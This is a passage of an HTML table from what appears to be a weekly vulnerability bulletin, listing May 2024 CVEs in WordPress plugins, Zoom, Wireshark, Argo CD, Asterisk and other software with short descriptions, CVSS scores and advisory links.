<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32719&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32719" target="_blank">CVE-2024-32719</a><br><a href="https://patchstack.com/database/vulnerability/wp-club-manager/wordpress-wp-club-manager-plugin-2-2-11-broken-access-control-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WP Happy Coders--Comments Like Dislike<br> </td>
<td>Authentication Bypass by Spoofing vulnerability in WP Happy Coders Comments Like Dislike allows Functionality Bypass.This issue affects Comments Like Dislike: from n/a through 1.2.2.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-25906&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-25906" target="_blank">CVE-2024-25906</a><br><a href="https://patchstack.com/database/vulnerability/comments-like-dislike/wordpress-comments-like-dislike-plugin-1-2-1-ip-restriction-bypass-vulnerability-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WP Royal--Royal Elementor Addons<br> </td>
<td>Authentication Bypass by Spoofing vulnerability in WP Royal Royal Elementor Addons allows Functionality Bypass.This issue affects Royal Elementor Addons: from n/a through 1.3.93.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32786&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32786" target="_blank">CVE-2024-32786</a><br><a href="https://patchstack.com/database/vulnerability/royal-elementor-addons/wordpress-royal-elementor-addons-and-templates-plugin-1-3-93-ip-bypass-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WPBlockart--Magazine Blocks<br> </td>
<td>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WPBlockart Magazine Blocks allows Stored XSS.This issue affects Magazine Blocks: from n/a through 1.3.6.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34760&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34760" target="_blank">CVE-2024-34760</a><br><a href="https://patchstack.com/database/vulnerability/magazine-blocks/wordpress-magazine-blocks-plugin-1-3-6-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WPDeveloper--SchedulePress<br> </td>
<td>Missing Authorization vulnerability in WPDeveloper SchedulePress.This issue affects SchedulePress: from n/a through 5.0.8.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32717&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32717" target="_blank">CVE-2024-32717</a><br><a href="https://patchstack.com/database/vulnerability/wp-scheduled-posts/wordpress-schedulepress-plugin-5-0-8-broken-access-control-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WPMU DEV--Defender Security<br> </td>
<td>Insecure Storage of Sensitive Information vulnerability in WPMU DEV Defender Security allows : Screen Temporary Files for Sensitive Information.This issue affects Defender Security: from n/a through 3.3.2.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2022-44581&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2022-44581" target="_blank">CVE-2022-44581</a><br><a href="https://patchstack.com/database/vulnerability/defender-security/wordpress-defender-security-plugin-3-3-2-broken-authentication-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WPMU DEV--Defender Security<br> </td>
<td>Authentication Bypass by Spoofing vulnerability in WPMU DEV Defender Security allows Functionality Bypass.This issue affects Defender Security: from n/a through 4.4.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-25595&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-25595" target="_blank">CVE-2024-25595</a><br><a href="https://patchstack.com/database/vulnerability/defender-security/wordpress-defender-security-plugin-4-4-1-ip-restriction-bypass-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Wangshen--SecGate 3600<br> </td>
<td>A vulnerability, which was classified as critical, was found in Wangshen SecGate 3600 up to 20240516. This affects an unknown part of the file /?g=log_import_save. The manipulation of the argument reqfile leads to unrestricted upload. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-264747.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5050&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5050" target="_blank">CVE-2024-5050</a><br><a href="https://github.com/h0e4a0r1t/h0e4a0r1t.github.io/blob/master/2024/s%40%23NGfP%7B4%5Et(%7C%5Dd9/Wangshen%20SecGata%203600%20Firewall%20log_import_save%20arbitrary%20file%20upload%20vulnerability.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264747" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264747" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335968" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Warfare Plugins--Social Warfare<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in Warfare Plugins Social Warfare.This issue affects Social Warfare: from n/a through 4.4.5.1.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34825&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34825" target="_blank">CVE-2024-34825</a><br><a href="https://patchstack.com/database/vulnerability/social-warfare/wordpress-social-warfare-plugin-4-4-5-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Web-Settler--Landing Page Builder Free Landing Page Templates<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Web-Settler Landing Page Builder - Free Landing Page Templates allows Path Traversal.This issue affects Landing Page Builder - Free Landing Page Templates: from n/a through 3.1.9.9.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-24379&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-24379" target="_blank">CVE-2023-24379</a><br><a href="https://patchstack.com/database/vulnerability/ultimate-landing-page/wordpress-landing-page-builder-free-landing-page-templates-plugin-3-1-9-8-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WebToffee--Order Export &amp; Order Import for WooCommerce<br> </td>
<td>Deserialization of Untrusted Data vulnerability in WebToffee Order Export &amp; Order Import for WooCommerce.This issue affects Order Export &amp; Order Import for WooCommerce: from n/a through 2.4.9.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34751&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34751" target="_blank">CVE-2024-34751</a><br><a href="https://patchstack.com/database/vulnerability/order-import-export-for-woocommerce/wordpress-order-export-order-import-for-woocommerce-plugin-2-4-9-php-object-injection-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Webvitaly--iFrame<br> </td>
<td>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Webvitaly iFrame allows Stored XSS.This issue affects iFrame: from n/a through 5.0.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34805&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34805" target="_blank">CVE-2024-34805</a><br><a href="https://patchstack.com/database/vulnerability/iframe/wordpress-iframe-plugin-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Wireshark Foundation--Wireshark<br> </td>
<td>MONGO and ZigBee TLV dissector infinite loops in Wireshark 4.2.0 to 4.2.4, 4.0.0 to 4.0.14, and 3.6.0 to 3.6.22 allow denial of service via packet injection or crafted capture file</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4854&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:H" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4854" target="_blank">CVE-2024-4854</a><br><a href="https://gitlab.com/wireshark/wireshark/-/issues/19726" target="_blank">cve@gitlab.com</a><br><a href="https://gitlab.com/wireshark/wireshark/-/merge_requests/15047" target="_blank">cve@gitlab.com</a><br><a href="https://gitlab.com/wireshark/wireshark/-/merge_requests/15499" target="_blank">cve@gitlab.com</a><br><a href="https://www.wireshark.org/security/wnpa-sec-2024-07.html" target="_blank">cve@gitlab.com</a></td>
</tr>
<tr>
<td>WordPlus--BP Better Messages<br> </td>
<td>Missing Authorization vulnerability in WordPlus BP Better Messages allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects BP Better Messages: from n/a through 2.4.32.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32802&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32802" target="_blank">CVE-2024-32802</a><br><a href="https://patchstack.com/database/vulnerability/bp-better-messages/wordpress-better-messages-plugin-2-4-32-broken-authentication-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Wpmet--Wp Ultimate Review<br> </td>
<td>Authentication Bypass by Spoofing vulnerability in Wpmet Wp Ultimate Review allows Functionality Bypass.This issue affects Wp Ultimate Review: from n/a through 2.3.2.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21746&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21746" target="_blank">CVE-2024-21746</a><br><a href="https://patchstack.com/database/vulnerability/wp-ultimate-review/wordpress-wp-ultimate-review-plugin-2-2-5-ip-limit-bypass-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Wpmet--Wp Ultimate Review<br> </td>
<td>Client-Side Enforcement of Server-Side Security vulnerability in Wpmet Wp Ultimate Review allows Functionality Bypass.This issue affects Wp Ultimate Review: from n/a through 2.2.5.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32685&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32685" target="_blank">CVE-2024-32685</a><br><a href="https://patchstack.com/database/vulnerability/wp-ultimate-review/wordpress-wp-ultimate-review-plugin-2-2-5-review-score-manipulation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Zoom Video Communications, Inc.--Zoom Workplace VDI App for Windows<br> </td>
<td>Insufficient verification of data authenticity in the installer for Zoom Workplace VDI App for Windows may allow an authenticated user to conduct an escalation of privilege via local access.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27244&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27244" target="_blank">CVE-2024-27244</a><br><a href="https://www.zoom.com/en/trust/security-bulletin/zsb-24015/" target="_blank">security@zoom.us</a></td>
</tr>
<tr>
<td>Zoom Video Communications, Inc.--see references<br> </td>
<td>Buffer overflow in some Zoom Workplace Apps and SDK's may allow an authenticated user to conduct a denial of service via network access.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27243&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27243" target="_blank">CVE-2024-27243</a><br><a href="https://www.zoom.com/en/trust/security-bulletin/zsb-24014/" target="_blank">security@zoom.us</a></td>
</tr>
<tr>
<td>abuhayat--HTML5 Audio Player- Best WordPress Audio Player Plugin<br> </td>
<td>The HTML5 Audio Player- Best WordPress Audio Player Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.2.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4398&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4398" target="_blank">CVE-2024-4398</a><br><a href="https://plugins.trac.wordpress.org/browser/html5-audio-player/trunk/inc/Elementor/Widgets/Simple.php#L237" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/html5-audio-player/trunk/inc/elementor-widgets/fusion-audio-player.php#L275" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/html5-audio-player/trunk/inc/elementor-widgets/playlist.php#L541" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/html5-audio-player/trunk/inc/elementor-widgets/stamp-audio-player.php#L286" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ca646202-b9e2-4272-b0e2-d39cd748fb8e?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>aio-libs--aiosmtpd<br> </td>
<td>aiosmptd is a reimplementation of the Python stdlib smtpd.py based on asyncio. Prior to version 1.4.6, servers based on aiosmtpd accept extra unencrypted commands after STARTTLS, treating them as if they came from inside the encrypted connection. This could be exploited by a man-in-the-middle attack. Version 1.4.6 contains a patch for the issue.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34083&amp;vector=CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34083" target="_blank">CVE-2024-34083</a><br><a href="https://github.com/aio-libs/aiosmtpd/commit/b3a4a2c6ecfd228856a20d637dc383541fcdbfda" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/aio-libs/aiosmtpd/security/advisories/GHSA-wgjv-9j3q-jhg8" target="_blank">security-advisories@github.com</a><br><a href="https://nostarttls.secvuln.info/" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>argoproj--argo-cd<br> </td>
<td>Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. There is a Denial of Service (DoS) vulnerability via OOM using jq in ignoreDifferences. This vulnerability has been patched in version(s) 2.10.7, 2.9.12 and 2.8.16.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32476&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32476" target="_blank">CVE-2024-32476</a><br><a href="https://github.com/argoproj/argo-cd/commit/7893979a1e78d59cedd0ba790ded24e30bb40657" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/argoproj/argo-cd/commit/9e5cc5a26ff0920a01816231d59fdb5eae032b5a" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/argoproj/argo-cd/commit/e2df7315fb7d96652186bf7435773a27be330cac" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/argoproj/argo-cd/security/advisories/GHSA-9m6p-x4h2-6frq" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>asterisk--asterisk<br> </td>
<td>Asterisk is an open source private branch exchange and telephony toolkit. After upgrade to 18.23.0, ALL unauthorized SIP requests are identified as PJSIP Endpoint of local asterisk server. This vulnerability is fixed in 18.23.1, 20.8.1, and 21.3.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35190&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35190" target="_blank">CVE-2024-35190</a><br><a href="https://github.com/asterisk/asterisk/commit/85241bd22936cc15760fd1f65d16c98be7aeaf6d" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/asterisk/asterisk/pull/600" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/asterisk/asterisk/pull/602" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/asterisk/asterisk/security/advisories/GHSA-qqxj-v78h-hrf9" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>athemes--Sydney Toolbox<br> </td>
<td>The Sydney Toolbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the "aThemes: Portfolio" widget in all versions up to, and including, 1.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4473&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4473" target="_blank">CVE-2024-4473</a><br><a href="https://plugins.trac.wordpress.org/changeset/3082233/sydney-toolbox" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/60f16abd-951b-48a0-a363-0221f7e0957d?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>automattic--Jetpack WP Security, Backup, Speed, &amp; Growth<br> </td>
<td>The Jetpack - WP Security, Backup, Speed, &amp; Growth plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpvideo shortcode in all versions up to, and including, 13.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4392&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4392" target="_blank">CVE-2024-4392</a><br><a href="https://plugins.trac.wordpress.org/browser/jetpack/tags/13.3.1/modules/videopress/class.videopress-player.php#L335" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/11dceac7-7ff8-4384-9046-919c38947c32?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>avimegladon--Custom Post Type Attachment<br> </td>
<td>The Custom Post Type Attachment plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pdf_attachment' shortcode in all versions up to, and including, 3.4.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4546&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4546" target="_blank">CVE-2024-4546</a><br><a href="https://plugins.trac.wordpress.org/changeset/3087121/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f6ba2907-36f4-4c4d-9e25-d13d32e28690?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>bdthemes--Prime Slider Addons For Elementor (Revolution of a slider, Hero Slider, Ecommerce Slider)<br> </td>
<td>The Prime Slider - Addons For Elementor (Revolution of a slider, Hero Slider, Ecommerce Slider) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the General widget in all versions up to, and including, 3.14.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4339&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4339" target="_blank">CVE-2024-4339</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3080132%40bdthemes-prime-slider-lite%2Ftrunk&amp;old=3079066%40bdthemes-prime-slider-lite%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6eba6056-e087-4347-ad36-96501ceb4cdd?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>blakeblackshear--frigate<br> </td>
<td>Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Below 0.13.2 Release, when uploading a file or retrieving the filename, a user may intentionally use a large Unicode filename which would lead to a application-level denial of service. This is due to no limitation set on the length of the filename and the costy use of the Unicode normalization with the form NFKD under the hood of `secure_filename()`.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32874&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32874" target="_blank">CVE-2024-32874</a><br><a href="https://github.com/blakeblackshear/frigate/commit/cc851555e4029647986dccc8b8ecf54afee31442" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/blakeblackshear/frigate/security/advisories/GHSA-w4h6-9wrp-v5jq" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>blocksera--Image Hover Effects Elementor Addon<br> </td>
<td>The Image Hover Effects - Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Hover Effects Widget in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-1166&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-1166" target="_blank">CVE-2024-1166</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3068751%40image-hover-effects-addon-for-elementor&amp;new=3068751%40image-hover-effects-addon-for-elementor&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4d72a57f-9acc-43e4-af81-024bc6e0d3fd?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>boldgrid--Post and Page Builder by BoldGrid Visual Drag and Drop Editor<br> </td>
<td>The Post and Page Builder by BoldGrid - Visual Drag and Drop Editor plguin for WordPress is vulnerable to Stored Cross-Site Scripting via an unknown parameter in versions up to, and including, 1.26.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4400&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4400" target="_blank">CVE-2024-4400</a><br><a href="https://plugins.trac.wordpress.org/changeset/3087230/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9bb6683a-b8e6-4776-880f-5b48966fc5c6?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>brainstormforce--Elementor Header &amp; Footer Builder<br> </td>
<td>The Elementor Header &amp; Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'hfe_svg_mime_types' function in versions up to, and including, 1.6.28 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4634&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4634" target="_blank">CVE-2024-4634</a><br><a href="https://plugins.trac.wordpress.org/browser/header-footer-elementor/tags/1.6.28/inc/widgets-manager/class-widgets-loader.php#L156" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3086402/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f44bb823-bbf3-413b-82b5-a351609270bf?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>brainstormforce--Elementor Header &amp; Footer Builder<br> </td>
<td>The Elementor Header &amp; Footer Builder for WordPress is vulnerable to HTML Injection in all versions up to, and including, 1.6.26 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary HTML in pages that will be shown whenever a user accesses an injected page.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-2619&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5</a></td>
